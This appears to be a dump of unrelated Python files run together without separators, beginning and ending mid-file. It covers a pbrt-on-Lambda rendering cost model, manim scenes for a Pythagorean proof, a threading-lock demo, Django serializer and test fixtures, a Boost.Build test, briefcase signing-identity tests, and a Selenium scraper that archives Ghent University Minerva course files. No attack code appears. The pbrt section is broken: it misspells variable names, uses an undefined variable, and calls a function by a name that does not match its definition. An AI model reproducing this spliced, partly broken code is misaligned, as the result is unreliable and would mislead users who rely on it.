run_stats['traversals_per_ray'] total_ray_traversals = (run_stats['total_ray_traversals'] if 'total_ray_traversals' in run_stats else total_rays * traversals_per_ray) ray_footprint = run_stats['ray_footprint'] cpu_time_per_ray_traversal = run_stats['cpu_time_per_ray_traversal'] num_workers = run_stats['num_workers'] geometry_size = run_stats['geometry_size'] num_treelets = run_stats['num_treelets'] treelet_size = (run_stats['treelet_size'] if 'treelet_size' in run_stats else geometry_size / num_treelets) # boot time + time to load treelets + max(io time, compute time) io_time = total_rays * traverasls_per_ray * ray_footprint / (num_workers * worker_max_bandwidth) compute_time = total_rays * cpu_time_per_ray_traversal / num_workers total_time = boot_time + treelet_size / worker_max_bandwidth + max(io_time, compute_time) return total_time def calculate_model_run_time(scene_stats, num_workers): total_rays = scene_stats.total_rays * (2 * scene_stats.path_length - 1) traversals_per_ray = scene_stats.traversals_per_ray ray_footprint = scene_stats.ray_footprint total_bandwidth = total_rays * treelet_visits_per_ray * ray_footprint worker_bandwidth = Constants.WORKER_BANDWIDTH G = scene_stats.geometry_size TS = 0.1 # treelet size TREELETS_PER_RAY = np.log(G / TS) / np.log(2) print(Constants.L) NR = 2200000000 #L_B = 30/1000 L_B = 1/8 BB_B = 5/8 R = 64/(1000*1000*1000) stats = { 'boot_time': Constants.LAMBDA_BOOT_TIME, 'worker_max_bandwidth': Constants.LAMBDA_BANDWIDTH, 'total_rays': total_rays, 'traversasls_per_ray': traversals_per_ray, 'ray_footprint': Constants.RAY_FOOTPRINT, 'cpu_time_per_ray_traversal': Constants.CPU_TIME_PER_RAY_TRAVERSAL, 'treelet_size': scene_stats.treelet_size, } total_times = [calculate_run_time({**stats, 'num_workers': w}) for w in num_workers] return total_times def compare_model(): # Get scene information scene_stats = SceneStats() num_workers = range(1, 8001) total_times = calculate_model_run_times(scene_stats, num_workers) costs = [t * w * Constants.LAMBDA_COST for t, w in zip(total_times, num_workers)] #plt.plot(price_kf, total_time_kf, label='kf') plt.plot(costs, total_times, label='lambda') #plt.hlines([L_BOOT_TIME + TS / L_B], 0, 15) plt.ylim(0, 500) plt.title('Render / $') plt.ylabel('Render time (seconds)') plt.xlabel('Dollars ($)') plt.legend() plt.show() plt.savefig('model.png') plt.clf() def main(): parser = argparse.ArgumentParser(description=( 'Generate a trace file for viewing in chrome://tracing from cloud pbrt worker intervals.')) parser.add_argument('--diagnostics-directory', default='diag', help=( 'Path to the master_stats.txt generated by ' 'pbrt-lambda-master after finished a run.')) parser.add_argument('--trace-path', default='pbrt.tar.gz', help='Path to write the compressed trace file to.') parser.add_argument('--graph-path', default='graphs/', help='Directory to write the generated graphs to.') args = parser.parse_args() #compare_model() print('Reading diagnostics from {:s}...'.format(args.diagnostics_directory), end='') diagnostics = Stats(args.diagnostics_directory) print() diagnostics.write_csv('test.csv') print('Done reading diagnostics.') if False: path = write_trace(stats, args.trace_path) print('Wrote trace to {:s}.'.format(path)) if True: path = args.graph_path plot_metrics(diagnostics, path) print('Wrote graphs to {:s}.'.format(path)) if __name__ == "__main__": main() 0 import numpy as np import itertools as it from copy import deepcopy import sys from constants import * from scene.scene import Scene from geometry import Polygon from mobject.region import region_from_polygon_vertices, region_from_line_boundary A_COLOR = BLUE B_COLOR = MAROON_D C_COLOR = YELLOW TEX_MOB_SCALE_FACTOR = 0.5 POINTS = np.array([ DOWN, 2*UP, DOWN+RIGHT, 2*DOWN, 2*DOWN+RIGHT, DOWN+3*LEFT, 2*UP+3*LEFT, 4*RIGHT, 3*UP+3*RIGHT, ]) class Triangle(Polygon): def __init__(self, **kwargs): kwargs["color"] = C_COLOR Polygon.__init__( self, *POINTS[[0, 1, 2]], edge_colors=[B_COLOR, C_COLOR, A_COLOR], **kwargs ) nudge = 0.2 target = POINTS[0]+nudge*(UP+RIGHT) for direction in UP, RIGHT: self.add_line(POINTS[0]+nudge*direction, target, color=WHITE) def add_all_letters(self): for char in "abc": self.add_letter(char) return self def add_letter(self, char, nudge=0.3): mob = TexMobject(char).scale(TEX_MOB_SCALE_FACTOR) if char == "a": points = self.get_vertices()[[0, 2, 1]] elif char == "b": points = self.get_vertices()[[1, 0, 2]] elif char == "c": points = self.get_vertices()[[2, 1, 0]] center = 0.5*sum(points[:2]) # average of first two points mob.shift(center) normal_dir = rotate_vector(points[1] - points[0], np.pi/2, OUT) if np.dot(normal_dir, points[2]-center) > 0: normal_dir = -normal_dir normal_dir /= get_norm(normal_dir) mob.shift(nudge*normal_dir) self.add(mob) return self def place_hypotenuse_on(self, point1, point2): #self.vertices[1], self.vertices[2] start1, start2 = self.get_vertices()[[1, 2]] target_vect = np.array(point2)-np.array(point1) curr_vect = start2-start1 self.scale(get_norm(target_vect)/get_norm(curr_vect)) self.rotate(angle_of_vector(target_vect)-angle_of_vector(curr_vect)) self.shift(point1-self.get_vertices()[1]) return self def a_square(**kwargs): return Polygon(*POINTS[[0, 2, 4, 3]], color=A_COLOR, **kwargs) def b_square(**kwargs): return Polygon(*POINTS[[1, 0, 5, 6]], color=B_COLOR, **kwargs) def c_square(**kwargs): return Polygon(*POINTS[[1, 2, 7, 8]], color=C_COLOR, **kwargs) class DrawPointsReference(Scene): def construct(self): for point, count in zip(POINTS, it.count()): mob = TexMobject(str(count)).scale(TEX_MOB_SCALE_FACTOR) mob.shift(POINTS[count]) self.add(mob) class DrawTriangle(Scene): def construct(self): self.add(Triangle().add_all_letters()) class DrawAllThreeSquares(Scene): def construct(self): a = a_square() b = b_square() c = c_square() self.add(Triangle(), a, b, c) for letter, mob in zip("abc", [a, b, c]): char_mob = TexMobject(letter+"^2").scale(TEX_MOB_SCALE_FACTOR) char_mob.shift(mob.get_center()) self.add(char_mob) class AddParallelLines(DrawAllThreeSquares): args_list = [ (1, False), (2, False), (3, False), (3, True), ] @staticmethod def args_to_string(num, trim): return str(num) + ("Trimmed" if trim else "") def construct(self, num, trim): DrawAllThreeSquares.construct(self) shift_pairs = [ (4*RIGHT, 3*UP), (ORIGIN, DOWN), (3*LEFT, 2*DOWN) ] for side_shift, vert_shift in shift_pairs[:num]: line1 = Line(BOTTOM, TOP, color=WHITE) line1.shift(side_shift) line2 = Line(LEFT_SIDE, RIGHT_SIDE, color=WHITE) line2.shift(vert_shift) self.add(line1, line2) if trim: for mob in self.mobjects: mob.filter_out(lambda p: p[0] > 4) mob.filter_out(lambda p: p[0] < -3) mob.filter_out(lambda p: p[1] > 3) mob.filter_out(lambda p: p[1] < -2) class HighlightEmergentTriangles(AddParallelLines): args_list = [(3, True)] def construct(self, *args): AddParallelLines.construct(self, *args) triplets = [ [(0, 2), (0, -1), (1, -1)], [(1, -1), (4, -1), (4, 0)], [(4, 0), (4, 3), (3, 3)], [(3, 3), (0, 3), (0, 2)], ] for triplet in triplets: self.set_color_region( region_from_polygon_vertices(*triplet), color="DARK_BLUE" ) class IndicateTroublePointFromParallelLines(AddParallelLines): args_list = [(3, True)] def construct(self, *args): AddParallelLines.construct(self, *args) circle = Circle(radius=0.25) circle.shift(DOWN+RIGHT) vect = DOWN+RIGHT arrow = Arrow(circle.get_center()+2*vect, circle.get_boundary_point(vect)) arrow.set_color(circle.get_color()) self.add_mobjects_among(list(locals().values())) class DrawAllThreeSquaresWithMoreTriangles(DrawAllThreeSquares): args_list = [ (1, True), (2, True), (3, True), (4, True), (5, True), (6, True), (7, True), (8, True), (9, True), (10, True), (10, False) ] @staticmethod def args_to_string(num, fill): fill_string = "" if fill else "HollowTriangles" return str(num) + fill_string def construct(self, num, fill): DrawAllThreeSquares.construct(self) pairs = [ ((0, 2, 0), (1, -1, 0)), ((-3, -1, 0), (0, -2, 0)), ((4, -1, 0), (1, -2, 0)), ((0, -2, 0), (-3, -1, 0)), ((1, -2, 0), (4, -1, 0)), ((1, -1, 0), (4, 0, 0)), ((4, 0, 0), (3, 3, 0)), ((3, 3, 0), (0, 2, 0)), ((-3, 3, 0), (0, 2, 0)), ((0, 2, 0), (-3, 3, 0)) ] to_flip = [1, 3, 8, 9] for n in range(num): triangle = Triangle() if n in to_flip: triangle.rotate(np.pi, UP) self.add(triangle.place_hypotenuse_on(*pairs[n])) vertices = list(triangle.get_vertices()) if n not in to_flip: vertices.reverse() if fill: self.set_color_region( region_from_polygon_vertices(*vertices), color=DARK_BLUE ) class IndicateBigRectangleTroublePoint(DrawAllThreeSquaresWithMoreTriangles): args_list = [(10, False)] def construct(self, *args): DrawAllThreeSquaresWithMoreTriangles.construct(self, *args) circle = Circle(radius=0.25, color=WHITE) circle.shift(4*RIGHT) vect = DOWN+RIGHT arrow = Arrow(circle.get_center()+vect, circle.get_boundary_point(vect)) self.add_mobjects_among(list(locals().values())) class ShowBigRectangleDimensions(DrawAllThreeSquaresWithMoreTriangles): args_list = [(10, False)] def construct(self, num, fill): DrawAllThreeSquaresWithMoreTriangles.construct(self, num, fill) u_brace = Underbrace((-3, -2, 0), (4, -2, 0)) side_brace = Underbrace((-3, -3, 0), (2, -3, 0)) for brace in u_brace, side_brace: brace.shift(0.2*DOWN) side_brace.rotate(-np.pi/2) a_plus_2b = TexMobject("a+2b").scale(TEX_MOB_SCALE_FACTOR) b_plus_2a = TexMobject("b+2a").scale(TEX_MOB_SCALE_FACTOR) a_plus_2b.next_to(u_brace, DOWN) b_plus_2a.next_to(side_brace, LEFT) self.add_mobjects_among(list(locals().values())) class FillInAreaOfBigRectangle(DrawAllThreeSquaresWithMoreTriangles): args_list = [(10, False)] def construct(self, *args): DrawAllThreeSquaresWithMoreTriangles.construct(self, *args) args_list = [(10, False)] color = Color("yellow") color.set_rgb(0.3*np.array(color.get_rgb())) self.set_color_region( region_from_polygon_vertices( (-3, 3), (-3, -2), (4, -2), (4, 3) ), color=color ) class DrawOnlyABSquares(Scene): def construct(self): a = a_square() b = b_square() for char, mob in zip("ab", [a, b]): symobl = TexMobject(char+"^2").scale(TEX_MOB_SCALE_FACTOR) symobl.shift(mob.get_center()) self.add(symobl) triangle = Triangle() self.add_mobjects_among(list(locals().values())) class AddTriangleCopyToABSquares(DrawOnlyABSquares): def construct(self): DrawOnlyABSquares.construct(self) triangle = Triangle() triangle.rotate(np.pi, UP) triangle.place_hypotenuse_on(3*LEFT+DOWN, 2*DOWN) self.add(triangle) self.set_color_triangles() def set_color_triangles(self): for mob in self.mobjects: if isinstance(mob, Triangle): vertices = list(mob.get_vertices()) for x in range(2): self.set_color_region(region_from_polygon_vertices( *vertices ), color=DARK_BLUE) vertices.reverse() # silly hack class AddAllTrianglesToABSquares(AddTriangleCopyToABSquares): def construct(self): AddTriangleCopyToABSquares.construct(self) self.add(Triangle().place_hypotenuse_on(RIGHT+DOWN, 2*UP)) triangle = Triangle() triangle.rotate(np.pi, UP) triangle.place_hypotenuse_on(2*DOWN, 3*LEFT+DOWN) self.add(triangle) self.set_color_triangles() class DrawNakedCSqurae(Scene): def construct(self): c = c_square().center() triangle = Triangle().place_hypotenuse_on(*c.get_vertices()[[0, 1]]) triangle.add_all_letters() self.add(triangle, c) class DrawCSquareWithAllTraingles(Scene): args_list = [ (False, False, False, False), (False, True, False, True), (True, True, False, False), (False, True, True, False), ] @staticmethod def args_to_string(*toggle_vector): return "".join(map(str, list(map(int, toggle_vector)))) def construct(self, *toggle_vector): if len(toggle_vector) == 0: toggle_vector = [False]*4 self.c_square = c_square().center() vertices = it.cycle(self.c_square.get_vertices()) last_vertex = next(vertices) have_letters = False self.triangles = [] for vertex, should_flip in zip(vertices, toggle_vector): triangle = Triangle() pair = np.array([last_vertex, vertex]) if should_flip: triangle.rotate(np.pi, UP) pair = pair[[1, 0]] triangle.place_hypotenuse_on(*pair) if not have_letters: triangle.add_all_letters() have_letters = True self.triangles.append(triangle) self.add(triangle) last_vertex = vertex self.add(self.c_square) class HighlightCSquareInBigSquare(DrawCSquareWithAllTraingles): args_list = [tuple([False]*4)] def construct(self, *args): DrawCSquareWithAllTraingles.construct(self, *args) self.set_color_region(region_from_polygon_vertices( *c_square().center().get_vertices() ), color=YELLOW) class IndicateCSquareTroublePoint(DrawCSquareWithAllTraingles): def construct(self, *toggle_vector): DrawCSquareWithAllTraingles.construct(self, *toggle_vector) circle = Circle(color=WHITE) circle.scale(0.25) vertex = self.c_square.get_vertices()[1] circle.shift(vertex) vect = 2*RIGHT+DOWN arrow = Arrow(vertex+vect, circle.get_boundary_point(vect)) self.add(circle, arrow) class ZoomInOnTroublePoint(Scene): args_list = list(it.product([True, False], [True, False])) @staticmethod def args_to_string(with_labels, rotate): label_string = "WithLabels" if with_labels else "WithoutLabels" rotate_string = "Rotated" if rotate else "" return label_string + rotate_string def construct(self, with_labels, rotate): zoom_factor = 10 density = zoom_factor*DEFAULT_POINT_DENSITY_1D c = c_square(density=density) c.shift(-c.get_vertices()[1]) c.scale(zoom_factor) vertices = c.get_vertices() for index in 0, 1: triangle = Triangle(density=density) triangle.place_hypotenuse_on(vertices[index], vertices[index+1]) self.add(triangle) circle = Circle(radius=2.5, color=WHITE) angle1_arc = Circle(color=WHITE) angle2_arc = Circle(color=WHITE).scale(0.5) angle1_arc.filter_out(lambda x_y_z2: not ( x_y_z2[0] > 0 and x_y_z2[1] > 0 and x_y_z2[1] < x_y_z2[0]/3)) angle2_arc.filter_out(lambda x_y_z3: not ( x_y_z3[0] < 0 and x_y_z3[1] > 0 and x_y_z3[1] < -3*x_y_z3[0])) self.add_mobjects_among(list(locals().values())) self.add_elbow() if rotate: for mob in self.mobjects: mob.rotate(np.pi/2) if with_labels: alpha = TexMobject("\\alpha").scale(TEX_MOB_SCALE_FACTOR) beta = TexMobject("90-\\alpha").scale(TEX_MOB_SCALE_FACTOR) if rotate: alpha.next_to(angle1_arc, UP+0.1*LEFT) beta.next_to(angle2_arc, DOWN+0.5*LEFT) else: alpha.next_to(angle1_arc, RIGHT) beta.next_to(angle2_arc, LEFT) self.add(alpha, beta) def add_elbow(self): c = 0.1 p1 = c*LEFT + 3*c*UP p2 = 3*c*RIGHT + c*UP p3 = 2*c*RIGHT + 4*c*UP self.add(Line(p1, p3, color=WHITE)) self.add(Line(p2, p3, color=WHITE)) class DrawTriangleWithAngles(Scene): def construct(self): triangle = Triangle(density=2*DEFAULT_POINT_DENSITY_1D) triangle.scale(2).center().add_all_letters() vertices = triangle.get_vertices() kwargs = {"color": WHITE} angle1_arc = Circle(radius=0.4, **kwargs).filter_out( lambda x_y_z: not(x_y_z[0] > 0 and x_y_z[1] < 0 and x_y_z[1] < -3*x_y_z[0]) ).shift(vertices[1]) angle2_arc = Circle(radius=0.2, **kwargs).filter_out( lambda x_y_z1: not( x_y_z1[0] < 0 and x_y_z1[1] > 0 and x_y_z1[1] < -3*x_y_z1[0]) ).shift(vertices[2]) alpha = TexMobject("\\alpha") beta = TexMobject("90-\\alpha") alpha.shift(vertices[1]+3*RIGHT+DOWN) beta.shift(vertices[2]+3*RIGHT+UP) arrow1 = Arrow(alpha, angle1_arc) arrow2 = Arrow(beta, angle2_arc) self.add(triangle, angle1_arc, angle2_arc, alpha, beta, arrow1, arrow2) class LabelLargeSquare(DrawCSquareWithAllTraingles): args_list = [] def construct(self): DrawCSquareWithAllTraingles.construct(self) everything = Mobject(*self.mobjects) u_brace = Underbrace(2*(DOWN+LEFT), 2*(DOWN+RIGHT)) u_brace.shift(0.2*DOWN) side_brace = deepcopy(u_brace).rotate(np.pi/2) upper_brace = deepcopy(u_brace).rotate(np.pi) a_plus_b = TexMobject("a+b").scale(TEX_MOB_SCALE_FACTOR) upper_brace.add(a_plus_b.next_to(upper_brace, UP)) side_brace.add(a_plus_b.next_to(side_brace, RIGHT)) self.add(upper_brace, side_brace) class CompletelyFillLargeSquare(LabelLargeSquare): def construct(self): LabelLargeSquare.construct(self) vertices = [2*(DOWN+LEFT), 2*(DOWN+RIGHT), 2*(UP+RIGHT), 2*(UP+LEFT)] vertices.append(vertices[0]) pairs = list(zip(vertices, vertices[1:])) self.set_color_region(region_from_line_boundary(*pairs), color=BLUE) class FillComponentsOfLargeSquare(LabelLargeSquare): def construct(self): LabelLargeSquare.construct(self) points = np.array([ 2*UP+2*LEFT, UP+2*LEFT, 2*DOWN+2*LEFT, 2*DOWN+LEFT, 2*DOWN+2*RIGHT, DOWN+2*RIGHT, 2*UP+2*RIGHT, RIGHT+2*UP ]) for triplet in [[0, 1, 7], [2, 3, 1], [4, 5, 3], [6, 7, 5]]: triplet.append(triplet[0]) self.set_color_region(region_from_line_boundary(*[ [points[i], points[j]] for i, j in zip(triplet, triplet[1:]) ]), color=DARK_BLUE) vertices = points[[1, 3, 5, 7, 1]] self.set_color_region(region_from_line_boundary(*[ [p1, p2] for p1, p2 in zip(vertices, vertices[1:]) ]), color=YELLOW) class ShowRearrangementInBigSquare(DrawCSquareWithAllTraingles): args_list = [] def construct(self): self.add(Square(side_length=4, color=WHITE)) DrawCSquareWithAllTraingles.construct(self) self.remove(self.c_square) self.triangles[1].shift(LEFT) for i, j in [(0, 2), (3, 1)]: self.triangles[i].place_hypotenuse_on( *self.triangles[j].get_vertices()[[2, 1]] ) class ShowRearrangementInBigSquareWithRegions(ShowRearrangementInBigSquare): def construct(self): ShowRearrangementInBigSquare.construct(self) self.set_color_region(region_from_polygon_vertices( 2*(LEFT+UP), 2*LEFT+DOWN, RIGHT+DOWN, RIGHT+2*UP ), color=B_COLOR) self.set_color_region(region_from_polygon_vertices( RIGHT+DOWN, RIGHT+2*DOWN, 2*RIGHT+2*DOWN, 2*RIGHT+DOWN ), color=A_COLOR) # encoding: UTF-8 ''' Created on 2015年3月6日 @author: wanhao01 ''' import threading import time data = 0 lock = threading.Lock() def func(): global data print '%s acquire lock...' % threading.currentThread().getName() # 调用acquire([timeout])时,线程将一直阻塞, # 直到获得锁定或者直到timeout秒后(timeout参数可选)。 # 返回是否获得锁。 if lock.acquire(): print '%s get the lock.' % threading.currentThread().getName() data += 1 time.sleep(2) print '%s release lock...' % threading.currentThread().getName() # 调用release()将释放锁。 lock.release() t1 = threading.Thread(target=func) t2 = threading.Thread(target=func) t3 = threading.Thread(target=func) t1.start() t2.start() t3.start()orchestra/contrib/contacts/serializers.py from rest_framework import serializers #from orchestra.api.serializers import MultiSelectField from orchestra.contrib.accounts.serializers import AccountSerializerMixin from .models import Contact class ContactSerializer(AccountSerializerMixin, serializers.HyperlinkedModelSerializer): email_usage = serializers.MultipleChoiceField(choices=Contact.EMAIL_USAGES) class Meta: model = Contact fields = ( 'url', 'id', 'short_name', 'full_name', 'email', 'email_usage', 'phone', 'phone2', 'address', 'city', 'zipcode', 'country' ) from django.contrib.auth.models import Group from api.tests.data.product_ranges import TestProductRanges from api.tests.utils.test_objects import TestObjects class TestGroups(TestObjects): MODEL = Group # These models are created in the initial Django signal, not from this data. These are just for easy handling. ADMIN: MODEL ORDER: MODEL COAT_CHECK: MODEL CHECK_IN: MODEL TRANSFER: MODEL SCAN: MODEL PRODUCT_RANGE_ALL: MODEL PRODUCT_RANGE_1: MODEL PRODUCT_RANGE_2: MODEL @classmethod def init(cls): cls.ADMIN = cls.MODEL(id=14010, name='admin') cls.ORDER = cls.MODEL(id=14020, name='order') cls.COAT_CHECK = cls.MODEL(id=14030, name='coat_check') cls.CHECK_IN = cls.MODEL(id=14040, name='check_in') cls.TRANSFER = cls.MODEL(id=14050, name='transfer') cls.SCAN = cls.MODEL(id=14060, name='scan') cls.PRODUCT_RANGE_ALL = cls.MODEL(id=14070, name='product_range_all') cls.PRODUCT_RANGE_1 = cls.MODEL(id=14080, name=f'product_range_{TestProductRanges.JUST_WATER.id}') cls.PRODUCT_RANGE_2 = cls.MODEL(id=14090, name=f'product_range_{TestProductRanges.EVERYTHING.id}') cls.SAVED = [ cls.ADMIN, cls.ORDER, cls.COAT_CHECK, cls.CHECK_IN, cls.TRANSFER, cls.SCAN, cls.PRODUCT_RANGE_ALL, cls.PRODUCT_RANGE_1, cls.PRODUCT_RANGE_2 ] @classmethod def create(cls): # Establish links between these groups and the ones already in the DB. for group in cls.SAVED: group: Group = group group.id = Group.objects.get(name=group.name).id # Link to DB so many-to-many relations can be set. group.refresh_from_db() #!/usr/bin/python from BoostBuild import Tester t = Tester() t.write("project-root.jam", "import gcc ;") t.write("Jamfile", "lib a : a.cpp : . ;") t.write("a.cpp", """ #include void foo() {} """) t.write("a.h", "") t.write("d/Jamfile", "exe b : b.cpp ../a ; ") t.write("d/b.cpp", """ void foo(); int main() { foo(); } """) t.run_build_system(subdir="d") t.cleanup() from unittest import mock import pytest from briefcase.exceptions import BriefcaseCommandError from briefcase.platforms.macOS.app import macOSAppPackageCommand from tests.utils import DummyConsole class DummyPublishCommand(macOSAppPackageCommand): """ A Publish command that overrides """ def __init__(self, base_path, **kwargs): super().__init__(base_path=base_path, **kwargs) self.input = DummyConsole() @pytest.fixture def dummy_command(tmp_path): cmd = DummyPublishCommand(base_path=tmp_path) # Mock the options object cmd.options = mock.MagicMock() cmd.options.device = None # Mock get_identities mock_get_identities = mock.MagicMock() cmd.get_identities = mock_get_identities return cmd def test_explicit_identity_checksum(dummy_command): "If the user nominates an identity by checksum, it is used." # get_identities will return some options. dummy_command.get_identities.return_value = { '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)", '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)", } # The identity will be the onethe user specified as an option. result = dummy_command.select_identity('11E77FB58F13F6108B38110D5D92233C58ED38C5') assert result == "iPhone Developer: (BXAH5H869S)" # User input was not solicited assert dummy_command.input.prompts == [] def test_explicit_identity_name(dummy_command): "If the user nominates an identity by name, it is used." # get_identities will return some options. dummy_command.get_identities.return_value = { '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)", '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)", } # The identity will be the onethe user specified as an option. result = dummy_command.select_identity("iPhone Developer: (BXAH5H869S)") assert result == "iPhone Developer: (BXAH5H869S)" # User input was not solicited assert dummy_command.input.prompts == [] def test_invalid_identity_name(dummy_command): "If the user nominates an identity by name, it is used." # get_identities will return some options. dummy_command.get_identities.return_value = { '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)", '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)", } # The identity will be the onethe user specified as an option. with pytest.raises(BriefcaseCommandError): dummy_command.select_identity("not-an-identity") # User input was not solicited assert dummy_command.input.prompts == [] def test_implied_identity(dummy_command): "If there is only one identity, it is automatically picked." # get_identities will return some options. dummy_command.get_identities.return_value = { '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)", } result = dummy_command.select_identity() # The identity will be the only option available. assert result == "iPhone Developer: (BXAH5H869S)" # User input was not solicited assert dummy_command.input.prompts == [] def test_selected_identity(dummy_command): "If there is only one identity, it is automatically picked." # get_identities will return some options. dummy_command.get_identities.return_value = { '38EBD6F8903EC63C238B04C1067833814CE47CA3': "Developer ID Application: Example Corporation Ltd (Z2K4383DLE)", '11E77FB58F13F6108B38110D5D92233C58ED38C5': "iPhone Developer: (BXAH5H869S)", } # Return option 2 dummy_command.input.values = ['2'] result = dummy_command.select_identity() # The identity will be the only option available. assert result == "iPhone Developer: (BXAH5H869S)" # User input was solicited once assert dummy_command.input.prompts == ['> '] bcoppens/MinervArchiver #!/usr/bin/env python3 import logging import os from pathlib import Path from selenium import webdriver from selenium.webdriver.chrome.webdriver import WebDriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support.ui import Select import sys # Set-up the logger. logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', datefmt='%d/%m/%Y %H:%M:%S', level=logging.INFO) def ask_user(question: str) -> str: resp = None while not resp: resp = input(question) return resp def login(driver: WebDriver, username: str, password: str): # Load Minerva home. driver.get('https://minerva.ugent.be/') # Click the login button. login_btn = driver.find_element_by_id('btn_logincas') login_btn.click() sleep = WebDriverWait(driver, 10) sleep.until(lambda d: 'login.ugent.be' in d.current_url) # Fill in username. username_field = driver.find_element_by_id('username') username_field.send_keys(username) # Fill in password. password_field = driver.find_element_by_id('user_pass') password_field.send_keys(password) # Click authenticate button. login_auth_btn = driver.find_element_by_id('wp-submit') login_auth_btn.click() sleep = WebDriverWait(driver, 10) sleep.until(lambda d: 'minerva.ugent.be' in d.current_url) def get_courses(driver: WebDriver) -> set: driver.get("https://minerva.ugent.be/index.php") sleep = WebDriverWait(driver, 10) sleep.until(lambda d: 'index.php' in d.current_url) # Get the courses. courses = set() links = driver.find_elements_by_tag_name('a') for link in links: href = link.get_attribute('href') if href is not None and 'course_home.php?cidReq=' in href: courses.add(link.get_attribute('href')) return courses def get_clean_course_name(course: str, course_name: str): course_name_clean = "".join(c for c in course_name if c.isalpha() or c.isdigit() or c == ' ').rstrip() return f"{course[course.index('cidReq') + 7:]} - {course_name_clean.lower()}" def get_base_directory(course: str, course_name: str): return os.path.join(out_dir, get_clean_course_name(course, course_name)) def download_documents(driver: WebDriver, course: str): # Browse to the home directory. driver.get(course) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: course in d.current_url) files = course.replace("course_home", "document") driver.get(files) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: files in d.current_url) # Click the zip link. links = driver.find_elements_by_tag_name('a') ziplink = None for link in links: href = link.get_attribute('href') if href is not None and 'downloadfolder' in href: ziplink = href break if not ziplink: logging.error("ZIP-link not found :(") exit(1) # Determine the course name. course_name = None for c in driver.find_elements_by_tag_name('h1'): if 'minerva' not in str(c.text).lower(): course_name = c.text # Find the file name. new_name = f"{get_clean_course_name(course, course_name)}.zip" new_path = os.path.join(get_base_directory(course, course_name), "documents") Path(new_path).mkdir(parents=True, exist_ok=True) new_file = os.path.join(new_path, new_name) if os.path.exists(new_file): logging.info(f"Already exists {new_name}") return empties = driver.find_elements_by_class_name('italic') for empty in empties: if empty.tag_name == 'td' and 'Geen gegevens weer te geven' in empty.text: logging.info(f"No files found: {new_name}") return driver.get(ziplink) # Wait for the file to download. logging.info("Awaiting file download...") out_file = os.path.join(out_dir, 'documents.zip') sleep = WebDriverWait(driver, 1800) sleep.until(lambda d: os.path.exists(out_file)) # Rename the file. os.rename(out_file, new_file) logging.info(f"Saved {new_name}") # From https://selenium-python.readthedocs.io/waits.html class element_has_css_class(object): """An expectation for checking that an element has a particular css class. locator - used to find the element returns the WebElement once it has the particular css class """ def __init__(self, locator, css_class): self.locator = locator self.css_class = css_class def __call__(self, driver): element = driver.find_element(*self.locator) # Finding the referenced element if self.css_class in element.get_attribute("class"): return element else: return False def download_student_publications(driver: WebDriver, course: str): # Browse to the home directory. driver.get(course) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: course in d.current_url) links = driver.find_elements_by_tag_name('a') present = False for link in links: href = link.get_attribute('href') if href is not None and 'student_publication' in href: color = link.value_of_css_property("color") print (color) if "rgba(30, 100, 200, 1)" in str(color): present = True break if not present: return logging.info("Found student publications") files = course.replace("course_home/course_home.php", "student_publication/index.php") driver.get(files) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: files in d.current_url) # Click the zip link. links = driver.find_elements_by_tag_name('input') id_link = None for link in links: id = link.get_attribute('id') print (id) if id is not None and "select_all_none_actions_top" in id: id_link = link break if not id_link: logging.error("id-link not found :(") exit(1) id_link.click() #sleep = WebDriverWait(driver, 10) #element = sleep.until(element_has_css_class((By.ID, 'select_all_none_actions'), "multiple_actions_checkbox_checked")) selects = driver.find_elements_by_tag_name('select') dropdown = None for select in selects: name = select.get_attribute('name') if name is not None and "multiple_actions" in name: dropdown = select break if not dropdown: logging.error("dropdown not found, probably a visible student publications without submissions!") return Select(dropdown).select_by_visible_text("Download") inputs = driver.find_elements_by_tag_name('input') submit = None for input in inputs: id = input.get_attribute('id') if id is not None and "multiple_actions_submit" in id: submit = input break if not submit: logging.error("submit not found :(") exit(1) submit.click() driver.switch_to_alert().accept() # These files appear in out_dir/ under the name --studentpublications.zip # Given that I can't easily redirect these files in Selenium(?), just leave it def download_dropbox(driver: WebDriver, course: str): # Browse to the home directory. driver.get(course) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: course in d.current_url) links = driver.find_elements_by_tag_name('a') present = False for link in links: href = link.get_attribute('href') if href is not None and 'dropbox' in href: color = link.value_of_css_property("color") print (color) if "rgba(30, 100, 200, 1)" in str(color): present = True break if not present: return logging.info("Found dropbox") files = course.replace("course_home/course_home.php", "dropbox/index.php") driver.get(files) sleep = WebDriverWait(driver, 10) sleep.until(lambda d: files in d.current_url) # Click the zip link. links = driver.find_elements_by_tag_name('input') id_link = None for link in links: id = link.get_attribute('id') print (id) if id is not None and "select_all_none_actions_top" in id: id_link = link break if not id_link: logging.error("id-link not found :(") exit(1) id_link.click() #sleep = WebDriverWait(driver, 10) #element = sleep.until(element_has_css_class((By.ID, 'select_all_none_actions'), "multiple_actions_checkbox_checked")) selects = driver.find_elements_by_tag_name('select') dropdown = None for select in selects: name = select.get_attribute('name') if name is not None and "multiple_actions" in name: dropdown = select break if not dropdown: logging.error("dropdown not found, probably a visible dropbox without submissions!") return Select(dropdown).select_by_visible_text("Bestand/folder downloaden") inputs = driver.find_elements_by_tag_name('input') submit = None for input in inputs: id = input.get_attribute('id') if id is not None and "multiple_actions_submit" in id: submit = input break if not submit: logging.error("submit not found :(") exit(1) submit.click() driver.switch_to_alert().accept() # These files appear in out_dir/ but don't have a uniform name. If there is only one file, this takes the filename # of that file, if there are multiple, they are sent to a zip file. # Given that I can't easily redirect these files in Selenium(?), just leave it if __name__ == '__main__': # Validate arguments. if len(sys.argv) != 2: logging.error("Syntax: python3 main.py output_directory") exit(1) # Parse arguments. out_dir = 